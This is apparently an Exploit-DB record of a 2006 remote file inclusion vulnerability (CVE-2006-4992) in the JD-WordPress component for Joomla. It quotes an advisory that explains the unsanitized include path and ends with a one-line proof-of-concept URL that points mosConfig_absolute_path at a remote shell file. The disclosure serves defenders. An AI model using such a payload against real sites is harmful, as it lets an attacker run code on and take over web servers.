JD-WordPress 2.0-1.0 RC 2 for Joomla wp-trackback.php - Remote File Inclusion

2006-07-28T00:00:00
ID EDB-ID:28297
Type exploitdb
Reporter Drago84
Modified 2006-07-28T00:00:00

Description

JD-WordPress 2.0-1.0 RC 2 for Joomla wp-trackback.php Remote File Inclusion. CVE-2006-4992. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/19209/info
  
JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
  
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
  
Version 2.0-1.0 RC2 is vulnerable to these issues; prior versions may also be affected.

http://web/components/com_jd-wp/wp-trackback.php?mosConfig_absolute_path=http://shell.txt